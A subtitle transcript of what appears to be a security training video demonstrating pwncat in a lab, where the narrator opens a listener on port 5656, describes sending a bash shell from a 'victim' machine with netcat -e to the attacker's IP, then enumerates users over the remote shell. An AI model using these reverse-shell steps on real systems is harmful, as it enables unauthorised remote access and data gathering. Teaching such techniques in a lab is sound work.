WEBVTT 00:00:01.340 --> 00:00:02.950 Welcome back to our live environment. 00:00:02.950 --> 00:00:06.000 So now that we have pwncat installed and working properly, 00:00:06.050 --> 00:00:08.950 let's take a look on how to get a connection to our victim computer. 00:00:09.540 --> 00:00:10.930 If you read the pwncat manual, 00:00:10.940 --> 00:00:13.460 you see that there are several ways of starting a session, 00:00:13.840 --> 00:00:16.690 you can use SSH, you can connect to a bind shell, 00:00:16.700 --> 00:00:20.560 or the most common way, you can receive a reverse shell from the victim computer. 00:00:21.140 --> 00:00:22.460 So, let's see how that's done. 00:00:22.840 --> 00:00:25.560 On my attacker computer, I will open a listener with pwncat. 00:00:26.240 --> 00:00:30.660 I'll use pwncat ‑lp, which means listening port, 00:00:31.140 --> 00:00:33.060 and then the port that I want to listen. 00:00:33.840 --> 00:00:36.560 In my case, I'll use the port 5656. 00:00:37.640 --> 00:00:41.360 Now once I press Enter, pwncat will be listening for a connection. 00:00:42.040 --> 00:00:44.640 All we have to do now is go to our victim computer and 00:00:44.640 --> 00:00:46.150 send that shell to our attacker machine. 00:00:46.540 --> 00:00:48.200 And there are several ways of doing that. 00:00:48.380 --> 00:00:48.930 For example, 00:00:48.930 --> 00:00:51.960 you could exploit a vulnerability on a website and create a reverse shell. 00:00:52.640 --> 00:00:54.580 But in here, just for the sake of this demo, 00:00:54.590 --> 00:00:57.870 I will simply go to the victim computer and then use netcat to 00:00:57.870 --> 00:00:59.960 forward the bash shell to my attacker machine. 00:01:00.440 --> 00:01:06.320 So it looks like this, nc, then ‑e to specify the executable that I want for it, 00:01:06.330 --> 00:01:07.490 which is my bash binary, 00:01:07.490 --> 00:01:11.460 and then the IP of my attacker machine and the port that I have open. 00:01:13.140 --> 00:01:13.760 And that's it. 00:01:13.770 --> 00:01:16.710 Once I press Enter, I will have a connection at the pwncat. 00:01:17.540 --> 00:01:18.080 Take a look, 00:01:18.090 --> 00:01:21.160 it says here that it will receive the connection from our victim computer. 00:01:21.840 --> 00:01:22.560 Pretty cool, right? 00:01:23.240 --> 00:01:25.460 But note here on the terminal that it says local. 00:01:25.840 --> 00:01:28.900 And this means that this terminal is for the pwncat too. 00:01:28.900 --> 00:01:31.790 But, if you want to have a shell with my victim computer, 00:01:31.800 --> 00:01:33.760 I can simply press Ctrl+D, 00:01:34.240 --> 00:01:36.760 and then now we'll have a full shell with the victim computer. 00:01:37.640 --> 00:01:40.050 And this is pretty neat because I can go back and forth 00:01:40.050 --> 00:01:42.160 between my local shell and the victim computer. 00:01:42.940 --> 00:01:46.160 And again, in the remote shell, we can use any command that we want. 00:01:46.280 --> 00:01:48.760 It's like having a full TTY shell with the victim. 00:01:49.840 --> 00:01:51.570 Also, when I'm using the local shell, 00:01:51.580 --> 00:01:54.850 I can use the command sessions to check if my session is still open. 00:01:55.440 --> 00:01:58.160 As you can see here, we're still connected to the victim computer. 00:01:59.040 --> 00:02:01.200 The neat thing about pwncat is that it comes with 00:02:01.200 --> 00:02:02.660 several out‑of‑the‑box features. 00:02:03.040 --> 00:02:05.280 In this course, we'll focus on the persistence ones, 00:02:05.280 --> 00:02:08.560 but just as an example, let me show you some of the enumeration features. 00:02:09.240 --> 00:02:12.020 Like if you want to enumerate all the users in this machine, 00:02:12.030 --> 00:02:16.150 we can simply use run, then the module that I want to use, 00:02:16.160 --> 00:02:20.590 which is enumerate, and then., and the feature that I want to use, 00:02:20.890 --> 00:02:21.760 which is user. 00:02:22.840 --> 00:02:23.450 And that's it. 00:02:23.460 --> 00:02:24.470 When I press Enter, 00:02:24.480 --> 00:02:27.850 pwncat will retrieve from my victim computer all of the users in there. 00:02:28.540 --> 00:02:29.350 Really cool, right? 00:02:29.740 --> 00:02:31.830 And at any point when we are done, 00:02:31.840 --> 00:02:34.750 we can just exit pwncat and close the active sessions.